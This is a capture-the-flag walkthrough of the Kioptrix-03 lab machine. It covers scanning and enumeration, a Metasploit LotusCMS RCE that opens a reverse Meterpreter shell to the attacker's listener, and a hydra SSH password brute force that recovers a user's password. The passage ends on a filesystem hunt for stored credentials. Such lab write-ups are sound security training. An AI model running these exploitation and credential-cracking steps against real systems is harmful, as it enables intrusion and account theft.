The Kioptrix-03: Credential Hunger

This instalment of the Kioptrix series is about credential attacks, that is, attacks on someone's identity. Credentials are required for authentication when a person enters a system, and again when someone already inside wants to reach particular information. The information-security principle that governs credential management is "need to know": information is handed out according to responsibility, authority and job description. Let us follow the hunt for vulnerabilities on the Kioptrix-03 machine. I hope it is useful.

Stage One: Scanning and Enumeration

As in the earlier stories, we start the journey with nmap, the tool Trinity is seen using in The Matrix Reloaded. According to the information nmap gathers, the machine serves as a web server (Apache 2.2.8 with PHP 5.2.4) and runs SSH (OpenSSH 4.7p1) for remote administration. The full-port scan (-p-) with service and OS detection (-A):

root@kali2:~# nmap -p- -A 192.168.216.150
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-20 19:43 PDT
Nmap scan report for 192.168.216.150 (192.168.216.150)
Host is up (0.00080s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:BB:39:CC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.80 ms 192.168.216.150 (192.168.216.150)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.09 seconds
root@kali2:~# 

With nikto, dirb and Burp Suite we find a fair number of files and folders on Kioptrix-03, but only three findings are worth following up: the gallery folder, phpmyadmin, and the login form of the LotusCMS application (index.php). See the figures below. The gallery only renders properly when the name kioptrix3.com resolves to the target, so add the line 192.168.216.150 kioptrix3.com to /etc/hosts, pointing at the Kioptrix VM's address (not at the address of our own Kali machine); for one-off requests, curl's --resolve kioptrix3.com:80:192.168.216.150 does the same without touching /etc/hosts.

Figure 1. Login form of phpmyadmin
Figure 2. Login form of the LotusCMS application
Figure 3. The gallery folder on the Kioptrix3 server
root@kali2:~# dirb http://192.168.216.150

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Apr 20 19:49:35 2020
URL_BASE: http://192.168.216.150/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.216.150/ ----
==> DIRECTORY: http://192.168.216.150/cache/                                                                                                     
==> DIRECTORY: http://192.168.216.150/core/                                                                                                      
+ http://192.168.216.150/data (CODE:403|SIZE:326)                                                                                                
+ http://192.168.216.150/favicon.ico (CODE:200|SIZE:23126)                                                                                       
==> DIRECTORY: http://192.168.216.150/gallery/                                                                                                   
+ http://192.168.216.150/index.php (CODE:200|SIZE:1819)                                                                                          
==> DIRECTORY: http://192.168.216.150/modules/                                                                                                   
==> DIRECTORY: http://192.168.216.150/phpmyadmin/                                                                                                
+ http://192.168.216.150/server-status (CODE:403|SIZE:335)                                                                                       
==> DIRECTORY: http://192.168.216.150/style/                                                                                                     
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/cache/ ----
+ http://192.168.216.150/cache/index.html (CODE:200|SIZE:1819)                                                                                   
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/core/ ----
==> DIRECTORY: http://192.168.216.150/core/controller/                                                                                           
+ http://192.168.216.150/core/index.php (CODE:200|SIZE:0)                                                                                        
==> DIRECTORY: http://192.168.216.150/core/lib/                                                                                                  
==> DIRECTORY: http://192.168.216.150/core/model/                                                                                                
==> DIRECTORY: http://192.168.216.150/core/view/                                                                                                 
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/gallery/ ----
+ http://192.168.216.150/gallery/index.php (CODE:500|SIZE:5650)                                                                                  
==> DIRECTORY: http://192.168.216.150/gallery/photos/                                                                                            
==> DIRECTORY: http://192.168.216.150/gallery/themes/                                                                                            
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/phpmyadmin/ ----
+ http://192.168.216.150/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)                                                                            
+ http://192.168.216.150/phpmyadmin/index.php (CODE:200|SIZE:8136)                                                                               
==> DIRECTORY: http://192.168.216.150/phpmyadmin/js/                                                                                             
==> DIRECTORY: http://192.168.216.150/phpmyadmin/lang/                                                                                           
+ http://192.168.216.150/phpmyadmin/libraries (CODE:403|SIZE:342)                                                                                
+ http://192.168.216.150/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)                                                                                
==> DIRECTORY: http://192.168.216.150/phpmyadmin/scripts/                                                                                        
==> DIRECTORY: http://192.168.216.150/phpmyadmin/themes/                                                                                         
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/style/ ----
+ http://192.168.216.150/style/admin.php (CODE:200|SIZE:356)                                                                                     
+ http://192.168.216.150/style/index.php (CODE:200|SIZE:0)                                                                                       
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/core/controller/ ----
+ http://192.168.216.150/core/controller/index.php (CODE:200|SIZE:0)                                                                             
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/core/lib/ ----
+ http://192.168.216.150/core/lib/index.php (CODE:200|SIZE:0)                                                                                    
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/core/model/ ----
+ http://192.168.216.150/core/model/index.php (CODE:200|SIZE:0)                                                                                  
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/core/view/ ----
+ http://192.168.216.150/core/view/index.php (CODE:200|SIZE:0)                                                                                   
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                 
---- Entering directory: http://192.168.216.150/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Apr 20 19:50:05 2020
DOWNLOADED: 46120 - FOUND: 17
root@kali2:~# 
root@kali2:~# nikto -h http://192.168.216.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.216.150
+ Target Hostname:    192.168.216.150
+ Target Port:        80
+ Start Time:         2020-04-20 19:51:03 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 12:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2020-04-20 19:51:36 (GMT-7) (33 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali2:~# 

There is one more interesting lead. While exploring the gallery folder and posting a comment on the blog, we come across a hint that a user account named loneferret most probably exists (figure 4). That still has to be verified.

Figure 4. A user account named loneferret most probably exists

To confirm that the loneferret account exists we use Metasploit, specifically the auxiliary module auxiliary/scanner/ssh/ssh_enumusers. Its output:

msf5 auxiliary(scanner/ssh/ssh_enumusers) > show options 

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CHECK_FALSE  false            no        Check for false positives (random username)
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        22               yes       The target port
   THREADS      1                yes       The number of concurrent threads
   THRESHOLD    10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME     loneferret       no        Single username to test (username spray)
   USER_FILE                     no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet


msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.216.150
RHOSTS => 192.168.216.150
msf5 auxiliary(scanner/ssh/ssh_enumusers) > 
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.216.150:22 - SSH - Using malformed packet technique
[*] 192.168.216.150:22 - SSH - Starting scan
[+] 192.168.216.150:22 - SSH - User 'loneferret' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > 

Metasploit's verification indicates that the loneferret account is real, and it becomes important input for the next stage. One caveat: the default Malformed Packet action infers existence from the server answering differently for valid and invalid names, so before relying on a single hit, rerun with CHECK_FALSE set to true so that the module also probes a random user name as a control for false positives.

As for the operating system, Kioptrix03 most likely runs Ubuntu with a kernel somewhere between 2.6.9 and 2.6.33. The Ubuntu guess comes from the package strings in the OpenSSH and Apache banners ("Debian 8ubuntu1.2", "(Ubuntu)"), not from the OS fingerprint; the exact Ubuntu release and whether the machine is 32- or 64-bit are still unknown. OS identification was done with nmap using -O and --osscan-guess; the output follows:

root@kali2:~# nmap -O --osscan-guess 192.168.216.150
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-20 23:07 PDT
Nmap scan report for kioptrix3.com (192.168.216.150)
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:BB:39:CC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds

Stage Two: Mapping the Attack Surface

With the information found, collected and verified in the previous stage, we can draw a map of potential vulnerabilities and attack opportunities. Figure 5 shows that the operating system and both exposed services (HTTP and SSH) offer plenty of attack paths worth following up.

Figure 5. Attack-surface map of the Kioptrix3 server
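The map itself is the figure above; the mechanical part of building it is turning each product/version pair in the nmap report into an exploit-database search. The shell helper below is an added example, not code from the original write-up. It assumes nmap's normal output format (-oN, or the console output shown in stage one) and that searchsploit from the exploit-db package is installed when the generated commands are run. The two service lines embedded as NMAP_SAMPLE are copied from the scan above.

```bash
#!/usr/bin/env bash
# Added example, not part of the original walkthrough: turn the service lines
# of an nmap -sV / -A report (normal output, "PORT STATE SERVICE VERSION")
# into short product/version terms and searchsploit commands.

# Sample input: the two service lines from the Kioptrix3 scan above.
NMAP_SAMPLE='22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)'

# Read nmap output on stdin, print "port<TAB>product major.minor" per service.
# Only major.minor is kept because Exploit-DB titles name a branch
# ("OpenSSH 4.7", "Apache 2.2"), not a distro patch level such as 4.7p1.
nmap_service_terms() {
    awk '
    $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" && NF >= 4 {
        port = $1; product = ""; version = ""
        # product = words from field 4 up to the first token starting with a digit
        for (i = 4; i <= NF; i++) {
            if ($i ~ /^[0-9]/) { version = $i; break }
            product = (product == "" ? $i : product " " $i)
        }
        if (version != "" && match(version, /^[0-9]+\.[0-9]+/)) {
            print port "\t" product " " substr(version, RSTART, RLENGTH)
        }
        # secondary components written as NAME/x.y.z in the extra info, e.g. PHP/5.2.4
        for (i = 4; i <= NF; i++) {
            if ($i ~ /^[A-Za-z][A-Za-z0-9_-]*\/[0-9]+\.[0-9]+/) {
                split($i, kv, "/")
                if (match(kv[2], /^[0-9]+\.[0-9]+/)) {
                    print port "\t" kv[1] " " substr(kv[2], RSTART, RLENGTH)
                }
            }
        }
    }'
}

# One searchsploit command per distinct term. searchsploit matches titles that
# contain all the words of the term, so "OpenSSH 4.7" lists OpenSSH entries
# that mention 4.7.
nmap_to_searchsploit() {
    nmap_service_terms | cut -f2 | sort -u | sed 's/.*/searchsploit "&"/'
}

printf '%s\n' "$NMAP_SAMPLE" | nmap_service_terms
printf '%s\n' "$NMAP_SAMPLE" | nmap_to_searchsploit
```

In practice, save the scan with nmap -sV -oN scan.txt and run nmap_service_terms < scan.txt. Terms often need trimming before they are useful (searchsploit "Apache 2.2" finds more than "Apache httpd 2.2"), and the kernel line from -O is not covered, since the fingerprint gives a range rather than a version. searchsploit can also read nmap XML directly (nmap -oX scan.xml, then searchsploit --nmap scan.xml), which is the quicker route when the default search is all you want.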

Stage Three: Exploitation and Post-Exploitation

The tactical goal of exploitation is a limited shell; that of post-exploitation is system administrator (root) access. Privilege escalation in post-exploitation is unnecessary when exploitation already yields administrator rights: the Kioptrix1 story was an example of exploitation that needed no further privilege escalation, because the Remote Code Execution (RCE) vulnerability gave root directly.

We start by looking for Remote Code Execution (RCE) opportunities, guided by the attack-surface map from the previous stage.

No RCE against the operating system itself turned up. There are very likely memory-corruption (buffer overflow) bugs in a kernel this old, but the exploits for them are local privilege-escalation exploits, which need a shell first. Nor was any RCE found for OpenSSH 4.7p1.

Likewise, no RCE was found in phpMyAdmin or Apache. The opportunity is in LotusCMS, verified with the Metasploit exploit module exploit/multi/http/lcms_php_exec. Two things to notice in the session below. First, URI is the directory LotusCMS is installed in (the default /lcms/ assumes a sub-directory; here it is the web root), and the module locates the vulnerable page parameter by itself, as the line "Using found page param: /index.php?page=index" shows, so the query string set in the transcript is not what actually gets exploited; setting URI to / is enough. Second, id is not a Meterpreter command; the shell command drops into an OS shell, where it works. The session ends with a limited shell on Kioptrix3 as the user www-data:

root@kali2:~# msfconsole 
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1066 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > search lotuscms

Matching Modules
================

   #  Name                              Disclosure Date  Rank       Check  Description
   -  ----                              ---------------  ----       -----  -----------
   1  exploit/multi/http/lcms_php_exec  2011-03-03       excellent  Yes    LotusCMS 3.0 eval() Remote Command Execution


msf5 > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) > show options 

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.216.150
RHOSTS => 192.168.216.150
msf5 exploit(multi/http/lcms_php_exec) > set URI /index.php?system=Admin&page=loginSubmit
URI => /index.php?system=Admin&page=loginSubmit
msf5 exploit(multi/http/lcms_php_exec) > show payloads 

Compatible Payloads
===================

   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   1   generic/custom                                       normal  No     Custom Payload
   2   generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   3   generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   4   multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)
   5   multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)
   6   php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   7   php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   8   php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   9   php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   10  php/download_exec                                    normal  No     PHP Executable Download and Execute
   11  php/exec                                             normal  No     PHP Execute Command 
   12  php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   13  php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   14  php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   15  php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   16  php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   18  php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

msf5 exploit(multi/http/lcms_php_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/http/lcms_php_exec) > set LHOST 192.168.216.149
LHOST => 192.168.216.149
msf5 exploit(multi/http/lcms_php_exec) > show options 

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting                           Required  Description
   ----     ---------------                           --------  -----------
   Proxies                                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.216.150                           yes       The target address range or CIDR identifier
   RPORT    80                                        yes       The target port (TCP)
   SSL      false                                     no        Negotiate SSL/TLS for outgoing connections
   URI      /index.php?system=Admin&page=loginSubmit  yes       URI
   VHOST                                              no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.216.149  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf5 exploit(multi/http/lcms_php_exec) > exploit 

[*] Started reverse TCP handler on 192.168.216.149:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38247 bytes) to 192.168.216.150
[*] Meterpreter session 1 opened (192.168.216.149:4444 -> 192.168.216.150:49752) at 2020-04-21 06:21:05 -0700

meterpreter > id
[-] Unknown command: id.
meterpreter > shell
Process 6335 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

hostname
Kioptrix3

pwd
/home/www/kioptrix3.com

Besides RCE, another attack path worth pursuing is a brute-force attack on the loneferret account over SSH. We use hydra for online cracking, with a wordlist from the SecLists collection at https://github.com/danielmiessler/SecLists. The hydra options are -l because we test a single user name, -P because the passwords come from a wordlist, and -t for the number of concurrent tasks. Keep -t small against SSH (4 here): OpenSSH caps concurrent unauthenticated connections (MaxStartups), so more tasks mostly produce connection errors rather than speed. Hydra's output:

root@kali2:~# hydra -l loneferret -P ~/Tools/SecLists/Passwords/Common-Credentials/10k-most-common.txt ssh://192.168.216.150 -t 4
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-21 06:54:19
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 10000 login tries (l:1/p:10000), ~2500 tries per task
[DATA] attacking ssh://192.168.216.150:22/
[STATUS] 52.00 tries/min, 52 tries in 00:01h, 9948 to do in 03:12h, 4 active
[22][ssh] host: 192.168.216.150   login: loneferret   password: starwars
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-21 06:56:04
root@kali2:~# 
root@kali2:~# ssh loneferret@192.168.216.150
loneferret@192.168.216.150's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$ 

Hydra recovers loneferret's password: starwars. Logging in over SSH gets us into Kioptrix3 with a limited shell, just as the LotusCMS RCE did. A note on terminology: what hydra ran here is a dictionary (brute-force) attack, one known user name against many candidate passwords. A password spray is the opposite pattern, one or a few common passwords tried against many user names, chosen to stay below lockout thresholds (in hydra: -L users.txt -p password). Focusing on a single, verified user name rather than a wordlist full of unverified ones is exactly what the enumeration stage bought us. The SSH banner also settles the open question from that stage: kernel 2.6.24-24-server on Ubuntu, i686, that is, 32-bit.

So exploitation offers two ways to a limited shell. The LotusCMS RCE yields the www-data account; the SSH brute force yields loneferret. Either will do; this write-up continues with the second.

Logged in as loneferret, post-exploitation begins: escalating to root (system administrator). We start by hunting for sensitive information, specifically credentials, with find:

find / -maxdepth 5 -name '*.php' -type f -exec grep -Hn password {} \; 2>/dev/null

This walks the filesystem up to five directory levels deep and, for every file ending in .php, greps for the word password. Quote the glob: unquoted, the shell expands *.php against the current directory before find ever sees it. Output:

loneferret@Kioptrix3:~$ find / -maxdepth 5 -name '*.php' -type f -exec grep -Hn password {} \; 2>/dev/null
/usr/share/phpmyadmin/libraries/header.inc.php:101:    } elseif (isset($js_to_run) && $js_to_run == 'user_password.js') {
/usr/share/phpmyadmin/libraries/header.inc.php:111:    <script src="./js/user_password.js" type="text/javascript"></script>
/usr/share/phpmyadmin/libraries/common.inc.php:350:    'user_password.php',
/usr/share/phpmyadmin/libraries/common.inc.php:408:        'pma_servername', 'pma_username', 'pma_password',
/usr/share/phpmyadmin/libraries/common.inc.php:824:                $cfg['Server']['password'], true);
/usr/share/phpmyadmin/libraries/common.inc.php:832:            $cfg['Server']['password'], false);
/usr/share/phpmyadmin/libraries/config.default.php:58: * The 'cookie' auth_type uses blowfish algorithm to encrypt the password. If
/usr/share/phpmyadmin/libraries/config.default.php:162: * MySQL password (only needed with 'config' auth_type)
/usr/share/phpmyadmin/libraries/config.default.php:164: * @global string $cfg['Servers'][$i]['password']
/usr/share/phpmyadmin/libraries/config.default.php:166:$cfg['Servers'][$i]['password'] = '';
/usr/share/phpmyadmin/libraries/config.default.php:190: * Whether to try to connect without password
/usr/share/phpmyadmin/libraries/config.default.php:192: * @global boolean $cfg['Servers'][$i]['nopassword']
/usr/share/phpmyadmin/libraries/config.default.php:194:$cfg['Servers'][$i]['nopassword'] = false;
/usr/share/phpmyadmin/libraries/config.default.php:624: * show change password link
/usr/share/phpmyadmin/libraries/config.default.php:2173: * @global string $cfg['SQLValidator']['password']
/usr/share/phpmyadmin/libraries/config.default.php:2175:$cfg['SQLValidator']['password'] = '';
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:28: * Also set a username and password if you have a private one
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:70:            // The class defaults to anonymous with an empty password
/usr/share/phpmyadmin/libraries/sqlvalidator.lib.php:73:                $srv->setCredentials($cfg['SQLValidator']['username'], $cfg['SQLValidator']['password']);
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:46:        var $password;
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:97:        function _openSession($obj, $username, $password,
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:103:    $use_array = array("a_userName" => $username, "a_password" => $password, "a_callingProgram" => $calling_program, "a_callingProgramVersion" => $calling_program_version, "a_targetDbms" => $target_dbms, "a_targetDbmsVersion" => $target_dbms_version, "a_connectionTechnology" => $connection_technology, "a_connectionTechnologyVersion" => $connection_technology_version, "a_interactive" => $interactive);
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:107:           /* $ret = $obj->openSession($username, $password,
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:177:            $this->password                      = '';
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:195:         * @param  string  the password
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:199:        function setCredentials($username, $password)
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:202:            $this->password = $password;
/usr/share/phpmyadmin/libraries/sqlvalidator.class.php:342:            $this->session_data = $this->_openSession($this->service_link, $this->username, $this->password,
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:4: * Displays form for password change 
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:6: * @version $Id: display_change_password.lib.php 10796 2007-10-16 07:09:50Z cybot_tm $
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:23:    <fieldset id="fieldset_change_password">
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:38:                    <input type="password" name="pma_pw" id="pw_pma_pw" size="10" class="textfield" <?php echo $chg_evt_handler; ?>="nopass[1].checked = true" />
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:41:                    <input type="password" name="pma_pw2" id="pw_pma_pw2" size="10" class="textfield" <?php echo $chg_evt_handler; ?>="nopass[1].checked = true" />
/usr/share/phpmyadmin/libraries/display_change_password.lib.php:73:    <fieldset id="fieldset_change_password_footer" class="tblFooters">
/usr/share/phpmyadmin/libraries/common.lib.php:479:    // if the config password is wrong, or the MySQL server does not
/usr/share/phpmyadmin/libraries/common.lib.php:481:    // username/password
/usr/share/phpmyadmin/user_password.php:5: * @version $Id: user_password.php 10501 2007-07-18 15:32:08Z lem9 $
/usr/share/phpmyadmin/user_password.php:29: * If the "change password" form has been submitted, checks for valid values
/usr/share/phpmyadmin/user_password.php:51:        $err_url          = 'user_password.php?' . $common_url_query;
/usr/share/phpmyadmin/user_password.php:55:        $sql_query        = 'SET password = ' . (($pma_pw == '') ? '\'\'' : $hashing_function . '(\'' . preg_replace('@.@s', '*', $pma_pw) . '\')');
/usr/share/phpmyadmin/user_password.php:56:        $local_query      = 'SET password = ' . (($pma_pw == '') ? '\'\'' : $hashing_function . '(\'' . PMA_sqlAddslashes($pma_pw) . '\')');
/usr/share/phpmyadmin/user_password.php:59:        // Changes password cookie if required
/usr/share/phpmyadmin/user_password.php:60:        // Duration = till the browser is closed for password (we don't want this to be saved)
/usr/share/phpmyadmin/user_password.php:87: * If the "change password" form hasn't been submitted or the values submitted
/usr/share/phpmyadmin/user_password.php:91:$js_to_run = 'user_password.js';
/usr/share/phpmyadmin/user_password.php:100:require_once './libraries/display_change_password.lib.php';
